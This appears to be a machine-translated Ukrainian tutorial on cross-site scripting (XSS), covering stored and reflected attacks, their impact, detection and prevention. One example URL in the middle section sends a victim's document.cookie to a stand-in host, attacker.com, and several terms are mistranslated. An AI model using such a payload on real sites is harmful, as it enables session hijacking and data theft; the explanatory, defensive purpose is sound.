Вступ до перехресних сценаріїв

  • Зі збільшенням кількості веб-додатків в Інтернеті безпека веб-сайтів стала важливою проблемою. Зломи та крадіжки приватних даних користувачів зараз поширені, і це загрожує їм використовувати будь-яку програму. Cross Site Scripting - одна з популярних атак на безпеку веб-користувачів. Давайте ознайомимося з тим, що таке сценарій між сайтами.
  • Cross Site Scripting, що називається XSS, є вразливістю комп'ютерної безпеки, в якій зловмисник прагне додати якийсь шкідливий код у вигляді скриптів на надійний веб-сайт / веб-сторінку. Це атака введення коду на стороні клієнта, і зловмисний скрипт виконується у веб-браузері користувача, коли він отримує доступ до цього веб-сайту / веб-сторінки. Опосередковано цей веб-сайт стає середовищем для надсилання зловмисного коду користувачеві. Вводячи скрипти, зловмисники обходять DOM (Document Object Model) обмежень безпеки та отримують доступ до вмісту сторінки, що чутливі до користувача, сеансових файлів cookie, історії перегляду більшості приватних даних, що підтримуються браузером.
  • Веб-сайт, що містить форуми, дошки оголошень, веб-сторінки, що дозволяють коментарям, а також ті, що використовують несанізований ввід користувача та створений вихід, є найбільш вразливими до атак XSS. Хоча атаки XSS можливі у VBScript, ActiveX та CSS, вони найчастіше зустрічаються в Javascript як основоположний для більшості переглядів.

Різні типи перехресних сценаріїв (XSS)

Хоча не існує конкретної класифікації перехресних сценаріїв, деякі експерти класифікують її на два типи, які детально розглядаються нижче:

Збережено атаки XSS :

  • Зберігаються XSS - це ті, в яких зловмисний скрипт, який вводиться зловмисником, зберігається в базі даних і працює в браузері користувача, коли він намагається отримати доступ до бази даних в якійсь формі. Вони також відомі як стійкі або зберігаються XSS. Це одна з найбільш руйнівних атак і відбувається, особливо коли веб-сайт / веб-сторінка дозволяє коментувати або дозволяє вбудовувати вміст HTML.
  • Зловмисник додає javascript у коментар, який зберігається в базі даних, і коли користувач отримує доступ до постраждалої сторінки, отримуючи дані з бази даних, що зловмисний скрипт працює у своєму браузері, а цей зловмисник отримує несанкціонований доступ до приватних даних користувача.
  • Наприклад, на веб-сайті електронної комерції на зразок Olx, у якому є несанітизоване поле для опису товару, зловмисник, який продає продукт, додає в нього шкідливий javascript, і він зберігатиметься в базі даних веб-сайту.
  • Коли покупець відкриє опис продукту, щоб переглянути деталі продукту, тепер він стане жертвою, коли сценарій виконується в його веб-браузері, а всі реквізити користувача, який дозволяє браузер, будуть викрадені.

Процедура атак XSS:

  • Це один із найпоширеніших способів, за допомогою якого зловмисник може спричинити напад XSS на користувача. В основному в атаках Процедура XSS зловмисник націлює на жертву, надсилаючи електронний лист, шкідливе посилання або додаючи рядок до результату пошуку, який вказує на надійний веб-сайт, але містить зловмисний код JavaScript.
  • Якщо жертва натискає цю URL-адресу, вона ініціює HTTP-запит і надсилає запит вразливому веб-додатку. Потім запит повертається до жертви з відповіддю на вбудований код JavaScript, який веб-браузер виконує, вважаючи, що він надходить із надійного веб-сайту, і призводить до викрадення конфіденційних даних браузера.
  • Наприклад, на веб-сайті електронної комерції є вікно пошуку, в якому користувач може здійснювати пошук елементів, а рядок, записаний у вікні пошуку, видно в URL-адресі веб-сайту, коли запит на пошук надсилається серверу.
  • Зловмисник створює посилання, в якому зловмисний скрипт об'єднується в URL і надсилає його жертві по електронній пошті. Коли жертва відкриває це посилання, тоді запит надсилається на шкідливий веб-сайт зловмисника, і всі дані браузера жертви викрадаються та надсилаються до системи зловмисника.

Як працює міжсайтовий сценарій (XSS)?

  • Уразливість крос-сайтових сценаріїв (XSS) головним мотивом зловмисника є викрадення даних користувача, запустивши у своєму браузері шкідливий сценарій, який вводиться у вміст веб-сайту, який користувач використовує різними способами.
  • Наприклад, коли користувач шукає текст на веб-сайті, запит надсилається серверу у формі:

https://www.abcwebsite.com/search?q=text1

У результаті пошуку веб-сайт повертає результат разом із тим, що користувач шукав, як:

Ви шукали: text1

Якщо функція пошуку вразлива для XSS, зловмисник може додати в URL-адресу зловмисного сценарію:

https://www.abcwebsite.com/search= Розташування документа = https: //attacker.com/log.php? c = '+ encodeURIComponent (document.cookie)
  • Коли потерпілий натискає на це посилання, він перенаправляє на шкідливий веб-сайт, тобто https://attacker.com, і всі дані браузера безпосередньо надсилаються на комп’ютер зловмисника, в результаті чого зловмисник викрадає весь маркер / файли cookie сесії.
  • Таким чином, зловмисник вводить свій зловмисний скрипт у URL, Attacker також може зберігати цей скрипт на сервері, який знаходиться під Stosed XSS.

Вплив уразливих сценаріїв міжсайтового сценарію:

Вплив сценаріїв на різних веб-сайтах дуже різниться. Після використання вразливості XSS зловмисник отримує повний контроль над веб-переглядачем жертви і може виконувати різні дії, що відрізняються від маленьких, таких як перегляд історії браузера до згубних, таких як вставлення черв'яків у комп'ютер.

Деякі дії, які може виконувати зловмисник, використовуючи вразливість XSS, такі:

  1. Витік конфіденційної інформації, як ім’я користувача та пароль.
  2. Вставлення хробаків на комп’ютер.
  3. Перенаправлення користувача на якийсь небезпечний веб-сайт і змушення виконувати деякі дії
  4. Отримайте доступ до історії перегляду жертви.
  5. Установка програми троянських коней.
  6. Примушуйте користувача виконувати та змінювати значення в програмі, отримуючи доступ

Пошук уразливостей між сценаріями сценарію:

  • Уразливості XSS виникають з двох причин: або вхід від користувача не перевіряється перед відправленням на сервер, або вихід, отриманий у браузері, не кодується HTML. Маючи на увазі згубний вплив вразливості XSS та захищаючи конфіденційність користувачів, дуже важливо з’ясувати, чи вразливий веб-додаток до XSS чи ні.
  • Незважаючи на те, що XSS важко визначити та видалити, найкращим способом перевірки є проведення перевірки безпеки коду та перевірка всіх місць, де вхід з HTTP-запиту може зробити шлях відображення як вихід у програмі. Використання інструментів автоматичного сканування вразливості, які включають спеціалізований модуль сканера XSS для сканування всієї веб-програми, також може допомогти у скануванні та пошуку вразливих місць програми.

Чому запобігти XSS?

  • XSS - це вразливість введення коду, тому дуже важливо кодувати дані, які надсилаються на сервер, і дані, які надходять з сервера в браузер користувача.
  • Перевірка даних також дуже важлива, щоб браузер інтерпретував код без будь-яких шкідливих команд. Були запроваджені різні методи профілактики, які підтримують перевірку даних та кодування як пріоритет для вразливості веб-сайту до XSS.

Щоб запобігти XSS, слід зосередитись на деяких моментах:

  1. Підтримка HTTP Trace на всіх веб-серверах має бути вимкнена, оскільки зловмисник може викрасти файли cookie та дані приватного браузера через дзвінок сліду HTTP з сервера, навіть якщо в браузері жертви вимкнено document.cookie.
  2. Розробники повинні санітувати дані та ніколи не повинні виводити дані, отримані безпосередньо від користувача, не перевіряючи їх.
  3. Як правило, посилання повинні бути заборонені, якщо вони не починаються з протоколів, що містяться у списку, таких як HTTP: //, https: //, тим самим запобігаючи використанню схем URI, таких як javascript: //

Висновок:

Атаки XSS небезпечні та можуть зашкодити конфіденційності користувача та вкрасти дані, якщо звичайний користувач ретельно не перегляне програму. Тому розробники під час розробки програми повинні дотримуватися суворих правил безпеки, особливо щодо даних та сервера, щоб програма була найменш вразлива для XSS і більше користувачів може покластися на неї.

Рекомендовані статті

Це було керівництвом щодо того, що таке сценарій між веб-сайтами ?. Тут ми обговорюємо різні типи веб-сайтів, роботи, впливу та запобігання XSS відповідно. Ви також можете ознайомитися з іншими запропонованими нами статтями, щоб дізнатися більше -

  1. Як працює JavaScript
  2. Що таке фішинг-атака?
  3. Що таке кібератака?
  4. Кешування HTTP
  5. Як файли cookie працюють у JavaScript із прикладом?